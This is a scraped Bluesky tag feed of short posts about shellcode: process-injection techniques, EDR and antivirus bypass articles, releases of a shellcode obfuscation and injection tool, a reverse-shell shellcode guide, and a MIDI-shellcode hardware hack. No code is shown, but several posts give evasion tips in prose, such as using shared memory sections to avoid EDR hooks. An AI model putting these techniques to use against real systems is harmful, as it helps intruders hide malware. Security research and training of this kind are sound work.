Trending

#shellcode

Latest posts tagged with #shellcode on Bluesky

Latest Top
Trending
#Ukraine Conflict #U.S. Foreign Policy #F1 #Chinese Grand Prix #SNL #Venezuela Baseball #AEW Collision #Six Nations #Newcastle United #Arsenal vs Everton #Ukraine Conflict #U.S. Foreign Policy #F1 #Chinese Grand Prix #SNL #Venezuela Baseball #AEW Collision #Six Nations #Newcastle United #Arsenal vs Everton

Posts tagged #shellcode

@oxfemale.bsky.social
1 month ago
Preview
EarlyBird APC Injection: A Deep Technical Analysis The EarlyBird APC technique creates a trusted process in a suspended state, allocates memory for shellcode, and writes the payload. It then queues the shellcode as an Asynchronous Procedure Call (APC) to the suspended thread. Resuming the thread forces immediate, stealthy execution of the malicious code.

Original text by Malforge Group


This article provides a detailed examination of the EarlyBird APC Injection technique, a sophisticated method for executing arbitrary code within the context of a trusted process. #APC #bypass #EDR #injection #QueueUserAPC #shellcode #windows
core-jmp.org/?p=242

0 0 0 0
@oxfemale.bsky.social
1 month ago
Preview
Abusing Microsoft Warbird for Shellcode Execution The article demonstrates an EDR bypass by using an undocumented Warbird interface to stealthily load shellcode.

Original text by cirosec.de


TL;DR


In this blog post, we’ll be covering Microsoft Warbird and how we can abuse it to sneakily load shellcode without being detected by AV or EDR solutions. #bypass #edt #microsoft #shellcode #Warbird #windows
core-jmp.org/?p=221

0 0 0 0
@oxfemale.bsky.social
1 month ago
Preview
Mastering Living off the Process in Offensive Security No need for overusing WriteProcessMemory, VirtualAlloc, injecting a DLL, etc. This way, everything you need to manipulate the remote process is self-contained and already available to the process.

Original text by R.B.C (g3tsyst3m)


Hello again everyone! Hope the start to the new year is treating you well. I am excited to share a new blog post with you! #asm #cpp #debug #gadgets #ROP #shellcode #windows
core-jmp.org/?p=159

0 0 0 0
GLOBAL Visibility aéPiot - by aePiot.ro
GLOBAL Visibility aéPiot - by aePiot.ro
@globalvisibility.bsky.social
2 months ago
MultiSearch Tag Explorer MultiSearch Tag Explorer - Explore tags and search results by aéPiot

#SHELLCODE
allgraph.ro/advanced-sea...
#ALESHIGN #BAWEKE
allgraph.ro/advanced-sea...
#BELARUSIAN #PARTISAN #MOVEMENT 2020 #PRESENT
multi-search-tag-explorer.aepiot.ro/advanced-sea...
aepiot.ro

0 0 0 0
2rZiKKbOU3nTafniR2qMMSE0gwZ
2rZiKKbOU3nTafniR2qMMSE0gwZ
@2rzikkbou3ntafnir2qmmse0gwz.activitypub.awakari.com.ap.brid.gy
2 months ago
Preview
PIC shellcode: The Rust Way Originally published at Cyberpath A Hands-On Analysis of the Rustic64 Project In...

PIC shellcode: The Rust Way Originally published at Cyberpath A Hands-On Analysis of the Rustic64 Project In cybersecurity and malware development the use of Position Independent Code (PIC) has gai...

#shellcode #rust #offensivesecurity #redteam

Origin | Interest | Match

0 0 0 0
Twuai
Twuai
@twuai.bsky.social
6 months ago
Preview
Android Hacking for Beginners | Ethical Hacking Full Course (Step-by-Step) | mobile hacking course Learn Android Ethical Hacking from Scratch! This course is designed for beginners who want to understand android hacking Watch at 1.5x speed 🔹 [00:00] - Introduction to Android Ethical Hacking 🔹 [01...

Android Hacking for Beginners | Ethical Hacking Full Course (Step-by-Step) | mobile hacking course twuai.com/search/8z7wG...
#msfvenom #metasploit #maldev #exploiting #android #malware #hacking101 #shellcode #binwalk

1 0 0 0
Reverse-Engineering
Reverse-Engineering
@reverse-engineering.activitypub.awakari.com.ap.brid.gy
7 months ago
Post image

A Mega Malware Analysis Tutorial Featuring Donut-Generated Shellcode A beginner-friendly tutorial on analyzing .NET malware teaches you how to use common tools, recognize techniques and understand ...

#Learning #Hub #Malware #.NET #IDA #Pro […]

[Original post on unit42.paloaltonetworks.com]

0 0 0 0
Reverse-Engineering
Reverse-Engineering
@reverse-engineering.activitypub.awakari.com.ap.brid.gy
9 months ago
Post image

Прячем shellcode в приложениях В этой статье мы рассмотри...

habr.com/ru/companies/otus/articl...

#reverse-engineering #exploit #shellcode #payload #windows #internals #reverse #reverse #engineering

Result Details

0 0 0 0
@cryptax.bsky.social
9 months ago
Publications | FortiGuard Labs A full malware analysis is quite long to perform. Depending on its complexity and the desired level of details, it takes between half a day and 10 ...

Slides of my presentation at @northsec.io are available here www.fortiguard.com/events/6101/...

Work on 2 different malware samples and showed how good the AI performed overall in decompiling them or de-obfuscating, but also some errors that it did in details.

#r2ai #ladvix #shellcode #linux #IoT

5 4 0 0
@psycore8.bsky.social
10 months ago
Preview
GitHub - psycore8/shencode: A versatile tool for working with shellcodes A versatile tool for working with shellcodes. Contribute to psycore8/shencode development by creating an account on GitHub.

I'm proud to announce the release of ShenCode 0.8.2. It is introducing a polymorphic WinExec shellcode creator with customizable commands.
I've planned to write more technical tutorials about some features. So long: check out @ github.com/psycore8/she...

#Shellcode #GitHub #MalwareDev #RedTeam

0 0 0 0
@psycore8.bsky.social
11 months ago
Preview
GitHub - psycore8/shencode: A versatile tool for working with shellcodes A versatile tool for working with shellcodes. Contribute to psycore8/shencode development by creating an account on GitHub.

After several weeks of fighting the Windows api, ShenCode 0.8.0 is out now. There are 3 new injection modules:

- DLL-Injection
- NtInjection
- Process_Overwriting

If you like it, please leave me a star:

github.com/psycore8/she...

#Shellcode #GitHub #MalwareDev #RedTeam

0 0 0 0
Areenzor
Areenzor
@areenzor.bsky.social
1 year ago

Injecting shellcode?

Avoid VirtualAlloc/WriteProcessMemory detection..

Use (NtMapViewOfSection) with a shared memory section between processes.

It bypasses common EDR hooks.

Subtle persistence wins.

#RedTeam #Malware #Infosec #Cybersecurity #EDR #Shellcode

0 0 0 0
CyberTaters
CyberTaters
@potato.software
1 year ago

Injecting shellcode?

Avoid VirtualAlloc/WriteProcessMemory detection..

Use (NtMapViewOfSection) with a shared memory section between processes.

It bypasses common EDR hooks.

Subtle persistence wins.

#RedTeam #Malware #Infosec #Potatosecurity #EDR #Shellcode

0 0 0 0
Reverse-Engineering
Reverse-Engineering
@reverse-engineering.activitypub.awakari.com.ap.brid.gy
1 year ago
Preview
Shellcode Over MIDI? Bad Apple On A PSR-E433, Kinda <p>If hacking on consumer hardware is about figuring out what it can do, and pushing it in directions that the manufacturer never dared to dream, then this is a very fine hack indeed. [Portasynthica3] takes on the Yamaha PSR-E433, a cheap beginner keyboard, discovers a shell baked into it, and takes it from there.</p> <p>[Portasynthinca3] <a href="https://psi3.ru/blog/swl01u/" target="_blank">reverse engineered the firmware, wrote shellcode for the device, embedded the escape in a MIDI note stream, and even ended up writing some simple LCD driver software totally decent refresh rate on the dot-matrix display</a>, all to support the lofty goal of displaying arbitrary graphics on the keyboard’s dot-matrix character display.</p> <p>Now, we want you to be prepared for a low-res video extravaganza here. You might have to squint a bit to make out what’s going on in the video, but keep in mind that it’s being sent over a music data protocol from the 1980s, running at 31.25 kbps, displayed in the custom character RAM of an LCD.</p> <p>As always, the hack starts with research. Identifying the microcontroller CPU lead to JTAG and OpenOCD. (We love the technique of looking at the draw on a bench power meter to determine if the chip is responding to pause commands.) Dumping the code and tossing it into Ghidra lead to the unexpected discovery that Yamaha had put a live shell in the device that communicates over MIDI, presumably for testing and development purposes. This shell had PEEK and POKE, which meant that OpenOCD could go sit back on the shelf. Poking “Hello World” into some free RAM space over <a href="https://cmtext.indiana.edu/MIDI/chapter3_system_messages.php" target="_blank">MIDI sysex</a> was the first proof-of-concept.</p> <p>The final hack to get video up and running was to dig deep into the custom character-generation RAM, write some code to disable the normal character display, and then fool the CPU into calling this code instead of the shell, in order to increase the update rate. All of this for a thin slice of Bad Apple over MIDI, but more importantly, for the glory. And this hack is glorious! Go check it out in full.</p> <p>MIDI is entirely hacker friendly, and it’s likely you can hack together a musical controller that would wow your audience just with stuff in your junk box. If you’re at all into music, and you’ve never built your own MIDI devices, <a href="https://hackaday.com/2024/10/20/a-parts-bin-midi-controller-in-24-hours/">you have your weekend project</a>.</p> <p><span id="more-756042"></span></p> <p><iframe allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" allowfullscreen="" frameborder="0" height="450" referrerpolicy="strict-origin-when-cross-origin" src="https://www.youtube.com/embed/u6sukVMijBg?feature=oembed" title="Yamaha PSR-E433 Bad Apple demo" width="800"></iframe></p> <p>Thanks [James] for the gonzo tip!</p>

Shellcode over MIDI? Bad Apple on a PSR-E433, Kinda If hacking on consumer hardware is about figu...

hackaday.com/2025/01/23/shellcode-ove...

#Musical #Hacks #Reverse #Engineering #bad #apple #midi #reverse #engineering #shellcode #video

Event Attributes

1 0 0 0
Reverse-Engineering
Reverse-Engineering
@reverse-engineering.activitypub.awakari.com.ap.brid.gy
1 year ago
Preview
Shellcode Over MIDI? Bad Apple On A PSR-E433, Kinda <p>If hacking on consumer hardware is about figuring out what it can do, and pushing it in directions that the manufacturer never dared to dream, then this is a very fine hack indeed. [Portasynthica3] takes on the Yamaha PSR-E433, a cheap beginner keyboard, discovers a shell baked into it, and takes it from there.</p> <p>[Portasynthinca3] <a href="https://psi3.ru/blog/swl01u/" target="_blank">reverse engineered the firmware, wrote shellcode for the device, embedded the escape in a MIDI note stream, and even ended up writing some simple LCD driver software totally decent refresh rate on the dot-matrix display</a>, all to support the lofty goal of displaying arbitrary graphics on the keyboard’s dot-matrix character display.</p> <p>Now, we want you to be prepared for a low-res video extravaganza here. You might have to squint a bit to make out what’s going on in the video, but keep in mind that it’s being sent over a music data protocol from the 1980s, running at 31.25 kbps, displayed in the custom character RAM of an LCD.</p> <p>As always, the hack starts with research. Identifying the microcontroller CPU lead to JTAG and OpenOCD. (We love the technique of looking at the draw on a bench power meter to determine if the chip is responding to pause commands.) Dumping the code and tossing it into Ghidra lead to the unexpected discovery that Yamaha had put a live shell in the device that communicates over MIDI, presumably for testing and development purposes. This shell had PEEK and POKE, which meant that OpenOCD could go sit back on the shelf. Poking “Hello World” into some free RAM space over <a href="https://cmtext.indiana.edu/MIDI/chapter3_system_messages.php" target="_blank">MIDI sysex</a> was the first proof-of-concept.</p> <p>The final hack to get video up and running was to dig deep into the custom character-generation RAM, write some code to disable the normal character display, and then fool the CPU into calling this code instead of the shell, in order to increase the update rate. All of this for a thin slice of Bad Apple over MIDI, but more importantly, for the glory. And this hack is glorious! Go check it out in full.</p> <p>MIDI is entirely hacker friendly, and it’s likely you can hack together a musical controller that would wow your audience just with stuff in your junk box. If you’re at all into music, and you’ve never built your own MIDI devices, <a href="https://hackaday.com/2024/10/20/a-parts-bin-midi-controller-in-24-hours/">you have your weekend project</a>.</p> <p><span id="more-756042"></span></p> <p><iframe allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" allowfullscreen="" frameborder="0" height="450" referrerpolicy="strict-origin-when-cross-origin" src="https://www.youtube.com/embed/u6sukVMijBg?feature=oembed" title="Yamaha PSR-E433 Bad Apple demo" width="800"></iframe></p> <p>Thanks [James] for the gonzo tip!</p>

Shellcode over MIDI? Bad Apple on a PSR-E433, Kinda If hacking on consumer hardware is about figu...

hackaday.com/2025/01/23/shellcode-ove...

#Musical #Hacks #Reverse #Engineering #bad #apple #midi #reverse #engineering #shellcode #video

Event Attributes

0 0 0 0
@decrypt.lol
1 year ago
Preview
Guide to Creating Linux Reverse Shell Shellcode The article provides a detailed five-step guide for creating reverse shell shellcode in Linux, including code snippets and suggestions for enhancements.

Learn to create reverse shell shellcode in Linux with this comprehensive five-step guide. It includes code snippets and enhancement tips for better functionality. Boost your #cybersecurity skills and understand the mechanics of #threat models. #Linux #shellcode #infosec

0 0 0 0
phusion
phusion
@phusion.bsky.social
1 year ago
World's First MIDI Shellcode Blog post about a reverse engineering project

World's First MIDI Shellcode | #security #MIDI #shellcode #exploit | psi3.ru/blog/swl01u/

0 1 0 0
Cooper
Cooper
@ministraitor.bsky.social
1 year ago
Nullcon Security Conference & Training Nullcon is Asia’s largest international security conference, where key stakeholders from the industry, delegates from the government company representatives, COOs and hackers come together to talk abo...

🛠️ Malware that sleeps, works, and never stays! 😴

Learn how Kong Loader uses sleep masks to make malware invisible in memory throughout its execution, offering a new level of stealth and evasion

Join @tijme.bsky.social at #NullconGoa2025

👉 nullcon.net/goa-2025/spe...

#kongloader #shellcode

0 0 0 1
Josh Stroschein | The Cyber Yeti
Josh Stroschein | The Cyber Yeti
@jstrosch.bsky.social
1 year ago
Preview
Creating Windows Shellcode - YouTube This video series will walk you through how to create Windows shellcode! We'll use nasm for our assembler and sclauncher for testing. We'll discuss how to us...

🔥 Ready to learn how to create #windows #shellcode? This member's-only series on #YouTube will walk you through the basics. You'll find series resources 👇

www.thecyberyeti.com/training#win...

And the playlist 👇

youtube.com/playlist?lis...

0 0 0 0
⛧Zod Magus⛧
⛧Zod Magus⛧
@zodmagus.org
1 year ago
Post image

Omg hacking with shellcode was so damn fun, bravo. Day 8 of #AdventOfCyber done. #tryhackme #shellcode #msfvenom #hacktheplanet

4 0 1 0
@psycore8.bsky.social
1 year ago
Preview
GitHub - psycore8/shencode: A multi purpose tool for shellcode operations A multi purpose tool for shellcode operations. Contribute to psycore8/shencode development by creating an account on GitHub.

I’m excited to introduce Shencode 0.6.0! In this version, I’ve fixed numerous bugs, improved the OOP implementation, and added the new ByteSwap module (see my previous post). Please leave a star if you like the tool!

github.com/psycore8/she...

#Shellcode #GitHub #MalwareDev #RedTeam

2 0 0 0
Mr.Un1k0d3r
Mr.Un1k0d3r
@mrun1k0d3r.bsky.social
1 year ago
TrueCyber TrueCyber

We are going live tonight at 5 PM EST.

Tonight's session will demonstrate how to execute shellcode within a C# process without modifying memory permissions and avoiding EDR detection.

More information below.

www.linkedin.com/posts/charle...

truecyber.world

#pentest #redteam #shellcode

6 0 0 0
@psycore8.bsky.social
1 year ago
Obfuscation: ByteSwapping [NoSociety.de]

ByteSwapper: My polymorphic Shellcode with In-Memory Decoder and detailed explanation of Its functionality:

www.nosociety.de/en:it-securi...

#ShellCode #Malware-Dev #blog

0 0 0 0
@psycore8.bsky.social
1 year ago
Preview
GitHub - psycore8/shencode: A multi purpose tool for shellcode operations A multi purpose tool for shellcode operations. Contribute to psycore8/shencode development by creating an account on GitHub.

I've added a new module, to encrypt shellcode with AES. ShenCode 0.5.1 - Shellcode operations with love!
github.com/psycore8/she...

#shellcode #github #pentest

0 0 0 0
@psycore8.bsky.social
1 year ago
Preview
GitHub - psycore8/shencode: automation script for creating and obfuscating metasploit shellcode automation script for creating and obfuscating metasploit shellcode - psycore8/shencode

ShenCode 0.5.0 - a multi purpose tool for shellcode development github.com/psycore8/she...
#shellcode #github #pentest

0 1 0 0
@psycore8.bsky.social
1 year ago
Obfuscation: polymorphic in-memory decoder [NoSociety.de]

Develope a polymorphic shellcode: www.nosociety.de/en:it-securi...
#itsecurity #shellcode

0 0 0 0
@psycore8.bsky.social
1 year ago
Preview
GitHub - psycore8/shencode: automation script for creating and obfuscating metasploit shellcode automation script for creating and obfuscating metasploit shellcode - psycore8/shencode

ShenCode 0.4.0 out now!
#shellcode
github.com/psycore8/she...

0 0 0 0